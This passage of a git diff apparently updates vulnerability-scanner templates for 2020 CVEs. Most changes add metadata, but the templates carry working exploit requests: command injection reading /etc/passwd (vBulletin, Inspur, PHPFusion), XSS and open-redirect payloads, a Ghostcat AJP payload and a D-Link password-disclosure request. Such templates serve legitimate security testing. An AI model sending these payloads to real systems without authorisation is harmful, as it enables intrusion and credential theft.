# To carry out further attacks, please see references[2] below.
# This template works by passing a Hessian header, otherwise;
# it will return a 403 or 500 internal server error. References[3].
-
# References:
# - [1] https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
# - [2] https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
diff --git a/cves/2020/CVE-2020-15568.yaml b/cves/2020/CVE-2020-15568.yaml
index d2893442ef..c9408d639e 100644
--- a/cves/2020/CVE-2020-15568.yaml
+++ b/cves/2020/CVE-2020-15568.yaml
@@ -4,6 +4,7 @@ info:
name: TerraMaster TOS v4.1.24 RCE
author: pikpikcu
severity: critical
+ description: TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.
reference: https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/
tags: cve,cve2020,terramaster,rce
@@ -25,7 +26,7 @@ requests:
matchers:
- type: regex
regex:
- - "root:[x*]:0:0"
+ - "root:.*:0:0"
part: body
- type: status
status:
diff --git a/cves/2020/CVE-2020-15920.yaml b/cves/2020/CVE-2020-15920.yaml
index c4fb819067..e0457058b0 100644
--- a/cves/2020/CVE-2020-15920.yaml
+++ b/cves/2020/CVE-2020-15920.yaml
@@ -19,5 +19,5 @@ requests:
- 200
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
diff --git a/cves/2020/CVE-2020-16139.yaml b/cves/2020/CVE-2020-16139.yaml
new file mode 100644
index 0000000000..5ba27f8bc5
--- /dev/null
+++ b/cves/2020/CVE-2020-16139.yaml
@@ -0,0 +1,30 @@
+id: CVE-2020-16139
+
+info:
+ name: Cisco 7937G Denial-of-Service Reboot Attack
+ author: pikpikcu
+ severity: low
+ description: |
+ A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.
+ reference: https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/
+ tags: cve,cve2020,dos,cisco
+
+requests:
+ - raw:
+ - |
+ POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: header
+ words:
+ - "application/xml"
+ - type: word
+ words:
+ - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-16846.yaml b/cves/2020/CVE-2020-16846.yaml
index 648a55feba..de4756b826 100644
--- a/cves/2020/CVE-2020-16846.yaml
+++ b/cves/2020/CVE-2020-16846.yaml
@@ -9,8 +9,7 @@ info:
with the SSH client enabled, can result in shell injection.
This template supports the detection part only. See references.
-
- References:
+ reference: |
- https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag
- https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846
tags: cve,cve2020,saltstack
diff --git a/cves/2020/CVE-2020-16952.yaml b/cves/2020/CVE-2020-16952.yaml
index aaa6f90f78..372c227e0a 100644
--- a/cves/2020/CVE-2020-16952.yaml
+++ b/cves/2020/CVE-2020-16952.yaml
@@ -4,16 +4,13 @@ info:
name: Microsoft SharePoint Server-Side Include (SSI) and ViewState RCE
author: dwisiswant0
severity: critical
- reference: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
+ description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951.
+ reference: |
+ - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
+ - https://srcincite.io/pocs/cve-2020-16952.py.txt
+ - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
tags: cve,cve2020,sharepoint,iis
- # This template supports the detection part only. See references[2].
- # References:
- # - [1] Patch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16952
- # - [2] https://srcincite.io/pocs/cve-2020-16952.py.txt
- # - [3] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
- # - [4] https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
-
requests:
- method: GET
path:
diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml
new file mode 100644
index 0000000000..f448fae016
--- /dev/null
+++ b/cves/2020/CVE-2020-17362.yaml
@@ -0,0 +1,35 @@
+id: CVE-2020-17362
+
+info:
+ name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
+ reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
+ tags: cve,cve2020,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ words:
+ - "nova-lite"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-17453.yaml b/cves/2020/CVE-2020-17453.yaml
new file mode 100644
index 0000000000..17c80dd210
--- /dev/null
+++ b/cves/2020/CVE-2020-17453.yaml
@@ -0,0 +1,30 @@
+id: CVE-2020-17453
+
+info:
+ name: WSO2 Carbon Management Console - XSS
+ author: madrobot
+ severity: medium
+ description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
+ tags: xss,wso2,cve2020,cve
+ reference: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "'';alert('nuclei')//';"
+ part: body
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml
new file mode 100644
index 0000000000..bbcd6072f2
--- /dev/null
+++ b/cves/2020/CVE-2020-17496.yaml
@@ -0,0 +1,27 @@
+id: CVE-2020-17496
+info:
+ name: vBulletin Pre-Auth RCE
+ author: pussycat0x
+ severity: critical
+ reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
+ description: |
+ vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
+ tags: cve,cve2020,vbulletin,rce
+
+requests:
+ - raw:
+ - |
+ POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
+ Content-Type: application/x-www-form-urlencoded
+
+ subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-17505.yaml b/cves/2020/CVE-2020-17505.yaml
index bcb17cd7b0..3f0e6b6d93 100644
--- a/cves/2020/CVE-2020-17505.yaml
+++ b/cves/2020/CVE-2020-17505.yaml
@@ -6,15 +6,7 @@ info:
severity: high
description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
tags: cve,cve2020,rce
-
- # Artica Web Proxy 4.30.00000000
- # allows an authenticated remote attacker
- # to inject commands via the service-cmds parameter in cyrus.php.
- # These commands are executed with root
- # privileges via service_cmds_peform.
- # -
- # References:
- # > https://blog.max0x4141.com/post/artica_proxy/
+ reference: https://blog.max0x4141.com/post/artica_proxy/
requests:
- raw:
diff --git a/cves/2020/CVE-2020-17506.yaml b/cves/2020/CVE-2020-17506.yaml
index 005c5863e6..1770ca102b 100644
--- a/cves/2020/CVE-2020-17506.yaml
+++ b/cves/2020/CVE-2020-17506.yaml
@@ -6,14 +6,7 @@ info:
severity: critical
description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
tags: cve,cve2020
-
- # Artica Web Proxy 4.30.00000000
- # allows remote attacker to bypass privilege detection
- # and gain web backend administrator privileges
- # through SQL injection of the apikey parameter in fw.login.php.
- # -
- # References:
- # > https://blog.max0x4141.com/post/artica_proxy/
+ references: https://blog.max0x4141.com/post/artica_proxy/
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml
index feec0e65ff..c0d3c87ab1 100644
--- a/cves/2020/CVE-2020-17518.yaml
+++ b/cves/2020/CVE-2020-17518.yaml
@@ -2,10 +2,13 @@ id: CVE-2020-17518
info:
name: Apache Flink Upload Path Traversal
- author: pd-team
+ author: pdteam
severity: critical
reference: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
- tags: cve,cve2020,apache,traversal
+ description: |
+ Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system,
+ through a maliciously modified HTTP HEADER.
+ tags: cve,cve2020,apache,lfi
requests:
- raw:
@@ -30,4 +33,4 @@ requests:
matchers:
- type: dsl
dsl:
- - 'contains(body, "test-poc") == true && status_code == 200' # Using CVE-2020-17519 to confirm this.
+ - 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this.
diff --git a/cves/2020/CVE-2020-17519.yaml b/cves/2020/CVE-2020-17519.yaml
index 94a18e262f..f1c9a162b0 100644
--- a/cves/2020/CVE-2020-17519.yaml
+++ b/cves/2020/CVE-2020-17519.yaml
@@ -2,11 +2,11 @@ id: CVE-2020-17519
info:
name: Apache Flink directory traversal
- author: pd-team
+ author: pdteam
severity: high
description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
reference: https://github.com/B1anda0/CVE-2020-17519
- tags: cve,cve2020,apache,traversal
+ tags: cve,cve2020,apache,lfi
requests:
- method: GET
@@ -19,5 +19,5 @@ requests:
- 200
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
diff --git a/cves/2020/CVE-2020-17530.yaml b/cves/2020/CVE-2020-17530.yaml
index 38c7823e00..9c4507b2fa 100644
--- a/cves/2020/CVE-2020-17530.yaml
+++ b/cves/2020/CVE-2020-17530.yaml
@@ -4,16 +4,14 @@ info:
name: Apache Struts RCE
author: pikpikcu
severity: critical
- reference: http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
- tags: cve,cve2020,apache,rce
-
- # Forced OGNL evaluation, when evaluated on raw user input in tag attributes,
- # may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
- # References:
- # http://jvn.jp/en/jp/JVN43969166/index.html
- # http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
- # https://cwiki.apache.org/confluence/display/WW/S2-061
- # https://security.netapp.com/advisory/ntap-20210115-0005/
+ reference: |
+ - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
+ - http://jvn.jp/en/jp/JVN43969166/index.html
+ - https://cwiki.apache.org/confluence/display/WW/S2-061
+ - https://security.netapp.com/advisory/ntap-20210115-0005/
+ tags: cve,cve2020,apache,rce,struts
+ description: |
+ Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
requests:
- method: GET
@@ -24,5 +22,5 @@ requests:
matchers:
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
diff --git a/cves/2020/CVE-2020-1938.yaml b/cves/2020/CVE-2020-1938.yaml
new file mode 100644
index 0000000000..14c505aa53
--- /dev/null
+++ b/cves/2020/CVE-2020-1938.yaml
@@ -0,0 +1,19 @@
+id: CVE-2020-1938
+
+info:
+ name: Ghostcat - Apache Tomcat AJP File Read/Inclusion Vulnerability
+ author: milo2012
+ severity: high
+ reference: https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
+ tags: cve,cve2020,apache,tomcat,lfi,network
+
+network:
+ - inputs:
+ - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}"
+ host:
+ - "{{Hostname}}:8009"
+ read-size: 1024
+ matchers:
+ - type: word
+ words:
+ - "See the NOTICE file distributed with"
diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml
index e23b19c19f..021fb3e887 100644
--- a/cves/2020/CVE-2020-1943.yaml
+++ b/cves/2020/CVE-2020-1943.yaml
@@ -2,20 +2,23 @@ id: CVE-2020-1943
info:
name: Apache OFBiz Reflected XSS
- author: pd-team
+ author: pdteam
+ description: Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07.
severity: medium
tags: cve,cve2020,apache,xss
+ reference:
+ - https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E
requests:
- method: GET
path:
- - '{{BaseURL}}/control/stream?contentId='
+ - '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/cves/2020/CVE-2020-19625.yaml b/cves/2020/CVE-2020-19625.yaml
new file mode 100644
index 0000000000..2a6dce0689
--- /dev/null
+++ b/cves/2020/CVE-2020-19625.yaml
@@ -0,0 +1,30 @@
+id: CVE-2020-19625
+info:
+ name: Gridx 1.3 RCE
+ author: geeknik
+ description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter.
+ reference: https://github.com/oria/gridx/issues/433
+ severity: high
+ tags: cve,cve2020,gridx,rce
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "PHP Extension"
+ - "PHP Version"
+ condition: and
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'PHP Version ([0-9.]+)<\/h1>'
diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml
index 1cbc1e58aa..707e6c5343 100644
--- a/cves/2020/CVE-2020-2036.yaml
+++ b/cves/2020/CVE-2020-2036.yaml
@@ -3,6 +3,8 @@ info:
name: Palo Alto Networks Reflected XSS
author: madrobot
severity: medium
+ description: >
+ A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.
reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
tags: cve,cve2020,vpn,xss
diff --git a/cves/2020/CVE-2020-2096.yaml b/cves/2020/CVE-2020-2096.yaml
index 4059712193..1e17831e4b 100644
--- a/cves/2020/CVE-2020-2096.yaml
+++ b/cves/2020/CVE-2020-2096.yaml
@@ -4,6 +4,11 @@ info:
name: Jenkins Gitlab Hook XSS
author: madrobot
severity: medium
+ description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability.
+ reference: |
+ - https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
+ - http://www.openwall.com/lists/oss-security/2020/01/15/1
+ - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html
tags: cve,cve2020,jenkins,xss
requests:
diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml
new file mode 100644
index 0000000000..1e84564e2d
--- /dev/null
+++ b/cves/2020/CVE-2020-21224.yaml
@@ -0,0 +1,32 @@
+id: CVE-2020-21224
+
+info:
+ name: Inspur ClusterEngine V4.0 RCE
+ author: pikpikcu
+ severity: critical
+ description: A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server
+ reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
+ tags: cve,cve2020,clusterengine,rce
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/login"
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ Referer: "{{Hostname}}/module/login/login.html"
+
+ body: |
+ op=login&username=;`cat /etc/passwd`&password=
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-2140.yaml b/cves/2020/CVE-2020-2140.yaml
index 93832ed4d3..69eb751280 100644
--- a/cves/2020/CVE-2020-2140.yaml
+++ b/cves/2020/CVE-2020-2140.yaml
@@ -1,10 +1,10 @@
id: CVE-2020-2140
info:
author: j3ssie/geraldino2
- name: Jenkin AuditTrailPlugin XSS
+ name: Jenkin Audit Trail Plugin XSS
severity: medium
description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
- reference: https://nvd.nist.gov/vuln/detail/CVE-2020-2140
+ reference: https://www.jenkins.io/security/advisory/2020-03-09/
tags: cve,cve2020,jenkins,xss
requests:
diff --git a/cves/2020/CVE-2020-22840.yaml b/cves/2020/CVE-2020-22840.yaml
new file mode 100644
index 0000000000..69ef50972f
--- /dev/null
+++ b/cves/2020/CVE-2020-22840.yaml
@@ -0,0 +1,19 @@
+id: CVE-2020-22840
+
+info:
+ name: b2evolution CMS Open redirect
+ author: geeknik
+ severity: low
+ description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.
+ tags: cve,cve2020,redirect,b2evolution
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com"
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
+ part: header
diff --git a/cves/2020/CVE-2020-23517.yaml b/cves/2020/CVE-2020-23517.yaml
new file mode 100644
index 0000000000..7430e804ef
--- /dev/null
+++ b/cves/2020/CVE-2020-23517.yaml
@@ -0,0 +1,24 @@
+id: CVE-2020-23517
+
+info:
+ name: Aryanic HighMail (High CMS) XSS
+ author: geeknik
+ severity: medium
+ description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.
+ reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html
+ tags: xss,cve,cve2020
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login/?uid=\"> "
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - text/html
+ part: header
+ - type: word
+ words:
+ - "
+ ------WebKitFormBoundary88AhjLimsDMHU1Ak
+ Content-Disposition: form-data; name="postId"
+
+ 1
+ ------WebKitFormBoundary88AhjLimsDMHU1Ak--
+
+ extractors:
+ - type: regex
+ part: body
+ internal: true
+ name: wmuSecurity
+ group: 1
+ regex:
+ - 'wmuSecurity":"([a-z0-9]+)'
+
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '"url":"([a-z:\\/0-9-.]+)"'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'success":true'
+ - 'fullname'
+ - 'shortname'
+ - 'url'
+ condition: and
+ part: body
diff --git a/cves/2020/CVE-2020-24223.yaml b/cves/2020/CVE-2020-24223.yaml
index 79ee6d4237..31a1bf6446 100644
--- a/cves/2020/CVE-2020-24223.yaml
+++ b/cves/2020/CVE-2020-24223.yaml
@@ -4,6 +4,7 @@ info:
name: Mara CMS 7.5 - Reflective Cross-Site Scripting
author: pikpikcu
severity: medium
+ description: Mara CMS 7.5 allows cross-site scripting (XSS) in contact.php via the theme or pagetheme parameters.
reference: https://www.exploit-db.com/exploits/48777
tags: cve,cve2020,mara,xss
diff --git a/cves/2020/CVE-2020-24312.yaml b/cves/2020/CVE-2020-24312.yaml
index a0da61635f..81cc8aafe4 100644
--- a/cves/2020/CVE-2020-24312.yaml
+++ b/cves/2020/CVE-2020-24312.yaml
@@ -4,7 +4,9 @@ info:
name: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure
author: x1m_martijn
severity: high
- reference: https://nvd.nist.gov/vuln/detail/CVE-2020-24312
+ description: |
+ mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken.
+ reference: https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/
tags: cve,cve2020,wordpress,backups
# NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-24312
diff --git a/cves/2020/CVE-2020-24550.yaml b/cves/2020/CVE-2020-24550.yaml
new file mode 100644
index 0000000000..c85f31a04e
--- /dev/null
+++ b/cves/2020/CVE-2020-24550.yaml
@@ -0,0 +1,25 @@
+id: CVE-2020-24550
+
+info:
+ name: CVE-2020-24550
+ author: dhiyaneshDK
+ severity: medium
+ description: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL.
+ tags: cve,cve2020,redirect,episerver
+ reference: https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/
+
+requests:
+ - method: GET
+
+ path:
+ - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Location: https://example.com"
+ part: header
+ - type: status
+ status:
+ - 301
diff --git a/cves/2020/CVE-2020-24571.yaml b/cves/2020/CVE-2020-24571.yaml
index e7ebb5968e..3e8f391472 100644
--- a/cves/2020/CVE-2020-24571.yaml
+++ b/cves/2020/CVE-2020-24571.yaml
@@ -3,6 +3,7 @@ info:
name: NexusDB v4.50.22 Path Traversal
author: pikpikcu
severity: high
+ description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal.
reference: https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371
tags: cve,cve2020,nexusdb,lfi
diff --git a/cves/2020/CVE-2020-24579.yaml b/cves/2020/CVE-2020-24579.yaml
index 167db9f38c..5f354d7712 100644
--- a/cves/2020/CVE-2020-24579.yaml
+++ b/cves/2020/CVE-2020-24579.yaml
@@ -4,6 +4,7 @@ info:
name: DLINK DSL 2888a RCE
author: pikpikcu
severity: medium
+ description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.
reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
tags: cve,cve2020,dlink,rce
@@ -43,5 +44,5 @@ requests:
- type: regex
regex:
- "nobody:[x*]:65534:65534"
- - "root:[x*]:0:0"
+ - "root:.*:0:0"
condition: or
diff --git a/cves/2020/CVE-2020-24949.yaml b/cves/2020/CVE-2020-24949.yaml
new file mode 100644
index 0000000000..9b973fef67
--- /dev/null
+++ b/cves/2020/CVE-2020-24949.yaml
@@ -0,0 +1,26 @@
+id: CVE-2020-24949
+
+info:
+ name: PHPFusion 9.03.50 Remote Code Execution
+ author: geeknik
+ severity: high
+ description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
+ reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt
+ tags: cve,cve2020,phpfusion,rce,php
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"
+
+ matchers-condition: and
+ matchers:
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - "infusion_db.php"
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-25078.yaml b/cves/2020/CVE-2020-25078.yaml
new file mode 100644
index 0000000000..1789b5371c
--- /dev/null
+++ b/cves/2020/CVE-2020-25078.yaml
@@ -0,0 +1,32 @@
+id: CVE-2020-25078
+
+info:
+ name: D-Link DCS-2530L Administrator password disclosure
+ author: pikpikcu
+ severity: high
+ description: An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25078
+ tags: cve,cve2020,dlink
+
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/config/getuser?index=0"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "name="
+ - "pass="
+ condition: and
+
+ - type: word
+ words:
+ - "text/plain"
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml
index 9cc0ee8f57..05749737ab 100644
--- a/cves/2020/CVE-2020-25213.yaml
+++ b/cves/2020/CVE-2020-25213.yaml
@@ -1,11 +1,13 @@
-id: CVE-2020–25213
+id: CVE-2020-25213
info:
name: WP File Manager RCE
author: foulenzer
severity: critical
description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability.
- reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25213
+ reference: |
+ - https://plugins.trac.wordpress.org/changeset/2373068
+ - https://github.com/w4fz5uck5/wp-file-manager-0day
tags: cve,cve2020,wordpress,rce
# Uploaded file will be accessible at:-
diff --git a/cves/2020/CVE-2020-25495.yaml b/cves/2020/CVE-2020-25495.yaml
new file mode 100644
index 0000000000..a60c97dbea
--- /dev/null
+++ b/cves/2020/CVE-2020-25495.yaml
@@ -0,0 +1,30 @@
+id: CVE-2020-25495
+
+info:
+ name: SCO Openserver 5.0.7 - 'section' Reflected XSS
+ author: 0x_Akoko
+ description: A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'.
+ severity: medium
+ tags: cve,cve2020,sco,xss
+ reference: https://www.exploit-db.com/exploits/49300
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "hello "
+ part: body
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml
